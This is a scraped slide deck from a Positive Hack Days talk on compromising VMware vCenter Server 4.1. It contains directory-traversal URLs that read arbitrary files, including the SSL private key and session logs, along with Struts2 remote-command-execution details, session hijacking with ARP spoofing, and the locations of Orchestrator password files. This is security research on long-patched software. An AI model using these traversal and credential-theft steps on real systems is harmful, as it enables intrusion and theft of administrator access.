More Related Content
Similar to How to hack VMware vCenter server in 60 seconds (20)
More from Positive Hack Days (20)
How to hack VMware vCenter server in 60 seconds
- 1. How to hack VMware
vCenter server in
60 seconds
Alexey Sintsov
Alexander Minozhenko
- 4. Hijacking VMware
VMware vCenter Server
β’ VMware vCenter Server is solution to manage VMware vSphere
β’ vSphere β virtualization operating system
Β© 2002β2012, Digital
- 5. Hijacking VMware
Pen-testβ¦
β’ Vmware vCenter version 4.1 update 1
Services:
β’ Update Manager
β’ vCenter Orchestrator
β’ Chargeback
β’ Other
β’ Most of those services has web server
Β© 2002β2012, Digital
- 6. Hijacking VMware
VASTO and CVE-2009-1523
β’ Directory traversal in Jetty web server
http://target:9084/vci/download/health.xml/%3f/../../../../FILE
β’ Discovered by Claudio Criscione
β’ Fixed in VMware Update Manager 4.1 update 1 :(
β’ Who want to pay me for 0day?
β’ Pentester is not resercher?
Β© 2002β2012, Digital
- 8. Hijacking VMware
CVE-2010-1870
β’ VMware vCenter Orchestrator use Struts2 version 2.11 discovered by
Digital Defense, Inc
β’ CVE-2010-1870 Struts2/XWork remote command execution discovered
by Meder Kydyraliev
Fixed in 4.2
Β© 2002β2012, Digital
- 9. Hijacking VMware
Details
β’Struts2 does not properly escape β#β
β’Could be bypass with unicode βu0023β
β’2 variables need to be set for RCE
β’#_memberAccess['allowStaticMethodAccess']
β’#context['xwork.MethodAccessor.denyMethodExecution']
Β© 2002β2012, Digital
- 10. Hijacking VMware
But what about us?
β’ Directory traversal in Jetty web server β¦ AGAIN!
http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..
%5C..FILE.EXT
β’Metasploit module vmware_update_manager_traversal.rb by sinn3r
β’ We can read any file! But what
Claudio Criscione propose to read vpxd-profiler-* -
/SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-
FB72656A1DCB'/Username=βFakeDomainFakeUser'/SoapSession/Id='A
Sorry, patched in 4.1!
D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
Contains logs of SOAP requests with session ID !!!
Discovered by Alexey Sintsov 8)
Β© 2002β2012, Digital
- 11. Hijacking VMware
Attack #1
β’ Read vpxd-profiler via traversalβ¦
β’ Get Adminβs IP addresses from itβ¦
β’ Read secret SSL key
http://target:9084/vci/downloads/...............Documents and SettingsAll UsersApplication DataVMwareVMware VirtualCenterSSLrui.key
β’ ARP-SPOOF with SSL key - PROFIT
Β© 2002β2012, Digital
- 12. Hijacking VMware
VMware vCenter Orchestrator
β’ Vmware vCO β software for automate configuration
and management
β’ Install by default with vCenter
β’ Have interesting file
C:Program
filesVMwareInfrastructureOrchestratorconfigurationj
ettyetcpasswd.properties
Β© 2002β2012, Digital
- 13. Hijacking VMware
VMware vCenter Orchestrator
Password disclosure
Read hash -> crack MD5 -> log on into Orch. -> get vCenter pass
Β© 2002β2012, Digital
- 14. Hijacking VMware
VMware vCenter Orchestrator β more stuff
β’ vCO stored password at files:
β’ C:Program FilesVMwareInfrastructureOrchestratorapp-
<virtual-infrastructure-host
serverservervmoconfpluginsVC.xml
<enabled>true</enabled>
β’ C:Program FilesVMwareInfrastructureOrchestratorapp-
<url>https://new-virtual-center-host:443/sdk</url>
<administrator-username>vmware</administrator-username>
serverservervmoconfvmo.properties
<administrator-
password>010506275767b74786b383a4a60be767864740329d5fcf
324ec7fc98b1e0aaeef </administrator-password>
<pattern>%u</pattern>
</virtual-infrastructure-host>
Β© 2002β2012, Digital